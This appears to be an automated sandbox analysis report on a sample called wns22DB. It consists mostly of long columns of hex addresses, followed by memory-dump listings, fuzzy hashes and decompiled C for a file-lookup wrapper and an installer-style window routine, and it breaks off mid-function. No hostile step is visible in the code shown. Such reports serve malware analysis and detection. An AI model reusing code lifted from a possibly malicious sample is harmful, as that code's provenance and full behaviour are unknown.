                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x00406a1e
                                                                                                                                                                                                  0x00406a1f
                                                                                                                                                                                                  0x00406a1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a1b
                                                                                                                                                                                                  0x004069f5
                                                                                                                                                                                                  0x004069fa
                                                                                                                                                                                                  0x004069fa
                                                                                                                                                                                                  0x00406a03
                                                                                                                                                                                                  0x00406a0b
                                                                                                                                                                                                  0x00406a0e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a14
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a31
                                                                                                                                                                                                  0x00406a31
                                                                                                                                                                                                  0x00406a35
                                                                                                                                                                                                  0x004072e1
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072e1
                                                                                                                                                                                                  0x00406a3e
                                                                                                                                                                                                  0x00406a4e
                                                                                                                                                                                                  0x00406a51
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a54
                                                                                                                                                                                                  0x00406a57
                                                                                                                                                                                                  0x00406a5b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a5d
                                                                                                                                                                                                  0x00406a63
                                                                                                                                                                                                  0x00406a8d
                                                                                                                                                                                                  0x00406a93
                                                                                                                                                                                                  0x00406a9a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406a9a
                                                                                                                                                                                                  0x00406a69
                                                                                                                                                                                                  0x00406a6c
                                                                                                                                                                                                  0x00406a71
                                                                                                                                                                                                  0x00406a71
                                                                                                                                                                                                  0x00406a7c
                                                                                                                                                                                                  0x00406a84
                                                                                                                                                                                                  0x00406a87
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406acc
                                                                                                                                                                                                  0x00406ad2
                                                                                                                                                                                                  0x00406ad5
                                                                                                                                                                                                  0x00406ae2
                                                                                                                                                                                                  0x00406aea
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406aa1
                                                                                                                                                                                                  0x00406aa1
                                                                                                                                                                                                  0x00406aa5
                                                                                                                                                                                                  0x004072f0
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072f0
                                                                                                                                                                                                  0x00406ab1
                                                                                                                                                                                                  0x00406abc
                                                                                                                                                                                                  0x00406abc
                                                                                                                                                                                                  0x00406abc
                                                                                                                                                                                                  0x00406abf
                                                                                                                                                                                                  0x00406ac2
                                                                                                                                                                                                  0x00406ac5
                                                                                                                                                                                                  0x00406aca
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406d91
                                                                                                                                                                                                  0x00406d95
                                                                                                                                                                                                  0x00406db3
                                                                                                                                                                                                  0x00406db6
                                                                                                                                                                                                  0x00406dbd
                                                                                                                                                                                                  0x00406dc0
                                                                                                                                                                                                  0x00406dc3
                                                                                                                                                                                                  0x00406dc6
                                                                                                                                                                                                  0x00406dc9
                                                                                                                                                                                                  0x00406dcc
                                                                                                                                                                                                  0x00406dce
                                                                                                                                                                                                  0x00406dd5
                                                                                                                                                                                                  0x00406dd6
                                                                                                                                                                                                  0x00406dd8
                                                                                                                                                                                                  0x00406ddb
                                                                                                                                                                                                  0x00406dde
                                                                                                                                                                                                  0x00406de1
                                                                                                                                                                                                  0x00406de1
                                                                                                                                                                                                  0x00406de6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406de6
                                                                                                                                                                                                  0x00406d97
                                                                                                                                                                                                  0x00406d9a
                                                                                                                                                                                                  0x00406d9d
                                                                                                                                                                                                  0x00406da7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406dfb
                                                                                                                                                                                                  0x00406dff
                                                                                                                                                                                                  0x00406e22
                                                                                                                                                                                                  0x00406e25
                                                                                                                                                                                                  0x00406e28
                                                                                                                                                                                                  0x00406e32
                                                                                                                                                                                                  0x00406e01
                                                                                                                                                                                                  0x00406e01
                                                                                                                                                                                                  0x00406e04
                                                                                                                                                                                                  0x00406e07
                                                                                                                                                                                                  0x00406e0a
                                                                                                                                                                                                  0x00406e17
                                                                                                                                                                                                  0x00406e1a
                                                                                                                                                                                                  0x00406e1a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e3e
                                                                                                                                                                                                  0x00406e42
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e48
                                                                                                                                                                                                  0x00406e4c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e52
                                                                                                                                                                                                  0x00406e54
                                                                                                                                                                                                  0x00406e58
                                                                                                                                                                                                  0x00406e58
                                                                                                                                                                                                  0x00406e5b
                                                                                                                                                                                                  0x00406e5f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406eaf
                                                                                                                                                                                                  0x00406eb3
                                                                                                                                                                                                  0x00406eba
                                                                                                                                                                                                  0x00406ebd
                                                                                                                                                                                                  0x00406ec0
                                                                                                                                                                                                  0x00406eca
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406eca
                                                                                                                                                                                                  0x00406eb5
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406ed6
                                                                                                                                                                                                  0x00406eda
                                                                                                                                                                                                  0x00406ee1
                                                                                                                                                                                                  0x00406ee4
                                                                                                                                                                                                  0x00406ee7
                                                                                                                                                                                                  0x00406edc
                                                                                                                                                                                                  0x00406edc
                                                                                                                                                                                                  0x00406edc
                                                                                                                                                                                                  0x00406eea
                                                                                                                                                                                                  0x00406eed
                                                                                                                                                                                                  0x00406ef0
                                                                                                                                                                                                  0x00406ef0
                                                                                                                                                                                                  0x00406ef3
                                                                                                                                                                                                  0x00406ef6
                                                                                                                                                                                                  0x00406ef9
                                                                                                                                                                                                  0x00406ef9
                                                                                                                                                                                                  0x00406efc
                                                                                                                                                                                                  0x00406f03
                                                                                                                                                                                                  0x00406f08
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f96
                                                                                                                                                                                                  0x00406f96
                                                                                                                                                                                                  0x00406f9a
                                                                                                                                                                                                  0x00407338
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407338
                                                                                                                                                                                                  0x00406fa0
                                                                                                                                                                                                  0x00406fa3
                                                                                                                                                                                                  0x00406fa6
                                                                                                                                                                                                  0x00406faa
                                                                                                                                                                                                  0x00406fad
                                                                                                                                                                                                  0x00406fb3
                                                                                                                                                                                                  0x00406fb5
                                                                                                                                                                                                  0x00406fb5
                                                                                                                                                                                                  0x00406fb5
                                                                                                                                                                                                  0x00406fb8
                                                                                                                                                                                                  0x00406fbb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x00407019
                                                                                                                                                                                                  0x0040701d
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407344
                                                                                                                                                                                                  0x00407023
                                                                                                                                                                                                  0x00407026
                                                                                                                                                                                                  0x00407029
                                                                                                                                                                                                  0x0040702d
                                                                                                                                                                                                  0x00407030
                                                                                                                                                                                                  0x00407036
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x00407038
                                                                                                                                                                                                  0x0040703b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406de9
                                                                                                                                                                                                  0x00406dec
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407128
                                                                                                                                                                                                  0x0040712c
                                                                                                                                                                                                  0x0040714e
                                                                                                                                                                                                  0x00407151
                                                                                                                                                                                                  0x0040715b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040715b
                                                                                                                                                                                                  0x0040712e
                                                                                                                                                                                                  0x00407131
                                                                                                                                                                                                  0x00407135
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x00407138
                                                                                                                                                                                                  0x0040713b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004071e5
                                                                                                                                                                                                  0x004071e9
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x00407207
                                                                                                                                                                                                  0x0040720e
                                                                                                                                                                                                  0x00407215
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040721c
                                                                                                                                                                                                  0x004071eb
                                                                                                                                                                                                  0x004071ee
                                                                                                                                                                                                  0x004071f1
                                                                                                                                                                                                  0x004071f4
                                                                                                                                                                                                  0x004071fb
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x0040713f
                                                                                                                                                                                                  0x00407142
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072d6
                                                                                                                                                                                                  0x004072d9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f10
                                                                                                                                                                                                  0x00406f12
                                                                                                                                                                                                  0x00406f19
                                                                                                                                                                                                  0x00406f1a
                                                                                                                                                                                                  0x00406f1c
                                                                                                                                                                                                  0x00406f1f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f27
                                                                                                                                                                                                  0x00406f2a
                                                                                                                                                                                                  0x00406f2d
                                                                                                                                                                                                  0x00406f2f
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f31
                                                                                                                                                                                                  0x00406f32
                                                                                                                                                                                                  0x00406f35
                                                                                                                                                                                                  0x00406f3c
                                                                                                                                                                                                  0x00406f3f
                                                                                                                                                                                                  0x00406f4d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407223
                                                                                                                                                                                                  0x00407226
                                                                                                                                                                                                  0x0040722d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407232
                                                                                                                                                                                                  0x00407236
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040736e
                                                                                                                                                                                                  0x0040723c
                                                                                                                                                                                                  0x0040723f
                                                                                                                                                                                                  0x00407242
                                                                                                                                                                                                  0x00407246
                                                                                                                                                                                                  0x00407249
                                                                                                                                                                                                  0x0040724f
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407251
                                                                                                                                                                                                  0x00407254
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x00407257
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725a
                                                                                                                                                                                                  0x0040725e
                                                                                                                                                                                                  0x004072be
                                                                                                                                                                                                  0x004072c1
                                                                                                                                                                                                  0x004072c6
                                                                                                                                                                                                  0x004072c7
                                                                                                                                                                                                  0x004072c9
                                                                                                                                                                                                  0x004072cb
                                                                                                                                                                                                  0x004072ce
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072ce
                                                                                                                                                                                                  0x00407260
                                                                                                                                                                                                  0x00407266
                                                                                                                                                                                                  0x00407269
                                                                                                                                                                                                  0x0040726c
                                                                                                                                                                                                  0x0040726f
                                                                                                                                                                                                  0x00407272
                                                                                                                                                                                                  0x00407275
                                                                                                                                                                                                  0x00407278
                                                                                                                                                                                                  0x0040727b
                                                                                                                                                                                                  0x0040727e
                                                                                                                                                                                                  0x00407281
                                                                                                                                                                                                  0x0040729a
                                                                                                                                                                                                  0x0040729d
                                                                                                                                                                                                  0x004072a0
                                                                                                                                                                                                  0x004072a3
                                                                                                                                                                                                  0x004072a7
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072a9
                                                                                                                                                                                                  0x004072aa
                                                                                                                                                                                                  0x004072ad
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x00407283
                                                                                                                                                                                                  0x0040728b
                                                                                                                                                                                                  0x00407290
                                                                                                                                                                                                  0x00407292
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x00407295
                                                                                                                                                                                                  0x004072b0
                                                                                                                                                                                                  0x004072b7
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004072b9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406f55
                                                                                                                                                                                                  0x00406f58
                                                                                                                                                                                                  0x00406f8e
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070be
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c1
                                                                                                                                                                                                  0x004070c4
                                                                                                                                                                                                  0x004070c6
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407350
                                                                                                                                                                                                  0x004070cc
                                                                                                                                                                                                  0x004070cf
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070d5
                                                                                                                                                                                                  0x004070d9
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070dc
                                                                                                                                                                                                  0x00406f5a
                                                                                                                                                                                                  0x00406f5c
                                                                                                                                                                                                  0x00406f5e
                                                                                                                                                                                                  0x00406f60
                                                                                                                                                                                                  0x00406f63
                                                                                                                                                                                                  0x00406f64
                                                                                                                                                                                                  0x00406f66
                                                                                                                                                                                                  0x00406f68
                                                                                                                                                                                                  0x00406f6b
                                                                                                                                                                                                  0x00406f6e
                                                                                                                                                                                                  0x00406f84
                                                                                                                                                                                                  0x00406f89
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc1
                                                                                                                                                                                                  0x00406fc5
                                                                                                                                                                                                  0x00406ff1
                                                                                                                                                                                                  0x00406ff3
                                                                                                                                                                                                  0x00406ffa
                                                                                                                                                                                                  0x00406ffd
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407000
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407005
                                                                                                                                                                                                  0x00407007
                                                                                                                                                                                                  0x0040700a
                                                                                                                                                                                                  0x00407011
                                                                                                                                                                                                  0x00407014
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407041
                                                                                                                                                                                                  0x00407044
                                                                                                                                                                                                  0x00407047
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070bb
                                                                                                                                                                                                  0x00407049
                                                                                                                                                                                                  0x0040704f
                                                                                                                                                                                                  0x00407052
                                                                                                                                                                                                  0x00407055
                                                                                                                                                                                                  0x00407058
                                                                                                                                                                                                  0x0040705b
                                                                                                                                                                                                  0x0040705e
                                                                                                                                                                                                  0x00407061
                                                                                                                                                                                                  0x00407064
                                                                                                                                                                                                  0x00407067
                                                                                                                                                                                                  0x0040706a
                                                                                                                                                                                                  0x00407083
                                                                                                                                                                                                  0x00407085
                                                                                                                                                                                                  0x00407088
                                                                                                                                                                                                  0x00407089
                                                                                                                                                                                                  0x0040708c
                                                                                                                                                                                                  0x0040708e
                                                                                                                                                                                                  0x00407091
                                                                                                                                                                                                  0x00407093
                                                                                                                                                                                                  0x00407095
                                                                                                                                                                                                  0x00407098
                                                                                                                                                                                                  0x0040709a
                                                                                                                                                                                                  0x0040709d
                                                                                                                                                                                                  0x004070a1
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a3
                                                                                                                                                                                                  0x004070a4
                                                                                                                                                                                                  0x004070a7
                                                                                                                                                                                                  0x004070aa
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x0040706c
                                                                                                                                                                                                  0x00407074
                                                                                                                                                                                                  0x00407079
                                                                                                                                                                                                  0x0040707b
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x0040707e
                                                                                                                                                                                                  0x004070ad
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x0040703e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070b6
                                                                                                                                                                                                  0x004070b4
                                                                                                                                                                                                  0x00406fc7
                                                                                                                                                                                                  0x00406fca
                                                                                                                                                                                                  0x00406fcc
                                                                                                                                                                                                  0x00406fcf
                                                                                                                                                                                                  0x00406fd2
                                                                                                                                                                                                  0x00406fd5
                                                                                                                                                                                                  0x00406fd7
                                                                                                                                                                                                  0x00406fda
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fdd
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe0
                                                                                                                                                                                                  0x00406fe3
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00406fbe
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406fec
                                                                                                                                                                                                  0x00406fea
                                                                                                                                                                                                  0x00406f70
                                                                                                                                                                                                  0x00406f73
                                                                                                                                                                                                  0x00406f75
                                                                                                                                                                                                  0x00406f78
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e62
                                                                                                                                                                                                  0x00406e66
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040732c
                                                                                                                                                                                                  0x00406e6c
                                                                                                                                                                                                  0x00406e6f
                                                                                                                                                                                                  0x00406e72
                                                                                                                                                                                                  0x00406e75
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e77
                                                                                                                                                                                                  0x00406e7a
                                                                                                                                                                                                  0x00406e7d
                                                                                                                                                                                                  0x00406e80
                                                                                                                                                                                                  0x00406e83
                                                                                                                                                                                                  0x00406e86
                                                                                                                                                                                                  0x00406e89
                                                                                                                                                                                                  0x00406e8a
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8c
                                                                                                                                                                                                  0x00406e8f
                                                                                                                                                                                                  0x00406e92
                                                                                                                                                                                                  0x00406e95
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e98
                                                                                                                                                                                                  0x00406e9b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070df
                                                                                                                                                                                                  0x004070e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004070e9
                                                                                                                                                                                                  0x004070ec
                                                                                                                                                                                                  0x004070ef
                                                                                                                                                                                                  0x004070f2
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f4
                                                                                                                                                                                                  0x004070f7
                                                                                                                                                                                                  0x004070fa
                                                                                                                                                                                                  0x004070fd
                                                                                                                                                                                                  0x00407100
                                                                                                                                                                                                  0x00407103
                                                                                                                                                                                                  0x00407106
                                                                                                                                                                                                  0x00407107
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x00407109
                                                                                                                                                                                                  0x0040710c
                                                                                                                                                                                                  0x0040710f
                                                                                                                                                                                                  0x00407112
                                                                                                                                                                                                  0x00407115
                                                                                                                                                                                                  0x00407118
                                                                                                                                                                                                  0x0040711c
                                                                                                                                                                                                  0x0040711e
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00407123
                                                                                                                                                                                                  0x00407121
                                                                                                                                                                                                  0x00407356
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406985

                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                  • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                  			E0040672B(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x45e778); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x45e778;
			}




                                                                                                                                                                                                  0x00406736
                                                                                                                                                                                                  0x0040673f
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040674c
                                                                                                                                                                                                  0x00406742
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(004D5000,0045E778,0045A730,00405E0E,0045A730,0045A730,00000000,0045A730,0045A730,004D5000,?,746AF560,00405B1A,?,004D5000,746AF560), ref: 00406736
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                  • String ID: xE
                                                                                                                                                                                                  • API String ID: 2295610775-407097786
                                                                                                                                                                                                  • Opcode ID: c38ed24b0f8540a8630b6e30e0d29a5f0a32ff0f94a31cb594348fc3b8955e5f
                                                                                                                                                                                                  • Instruction ID: fc51c24eb8738f718e6fd544cb5c99b56e4f1c2878dc56694a5fb172fd41157c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c38ed24b0f8540a8630b6e30e0d29a5f0a32ff0f94a31cb594348fc3b8955e5f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83D012315150205BD2011738AD4C85B7A589F153367218B37B866F61E0C7348C62869C
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 00403AD8 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 215stringregistryCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 137 403ad8-403af0 call 4067c2 140 403af2-403afd GetUserDefaultUILanguage call 40632f 137->140 141 403b04-403b3b call 4062b6 137->141 144 403b02 140->144 147 403b53-403b59 lstrcatW 141->147 148 403b3d-403b4e call 4062b6 141->148 146 403b5e-403b87 call 403dae call 405dc5 144->146 154 403c19-403c21 call 405dc5 146->154 155 403b8d-403b92 146->155 147->146 148->147 161 403c23-403c2a call 40640a 154->161 162 403c2f-403c54 LoadImageW 154->162 155->154 156 403b98-403bc0 call 4062b6 155->156 156->154 163 403bc2-403bc6 156->163 161->162 165 403cd5-403cdd call 40140b 162->165 166 403c56-403c86 RegisterClassW 162->166 167 403bd8-403be4 lstrlenW 163->167 168 403bc8-403bd5 call 405cea 163->168 179 403ce7-403cf2 call 403dae 165->179 180 403cdf-403ce2 165->180 169 403da4 166->169 170 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 166->170 174 403be6-403bf4 lstrcmpiW 167->174 175 403c0c-403c14 call 405cbd call 4063e8 167->175 168->167 173 403da6-403dad 169->173 170->165 174->175 178 403bf6-403c00 GetFileAttributesW 174->178 175->154 182 403c02-403c04 178->182 183 403c06-403c07 call 405d09 178->183 189 403cf8-403d12 ShowWindow call 406752 179->189 190 403d7b-403d83 call 405523 179->190 180->173 182->175 182->183 183->175 195 403d14-403d19 call 406752 189->195 196 403d1e-403d30 GetClassInfoW 189->196 197 403d85-403d8b 190->197 198 403d9d-403d9f call 40140b 190->198 195->196 202 403d32-403d42 GetClassInfoW RegisterClassW 196->202 203 403d48-403d79 DialogBoxParamW call 40140b call 403a28 196->203 197->180 199 403d91-403d98 call 40140b 197->199 198->169 199->180 202->203 203->173
                                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                                  			E00403AD8(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
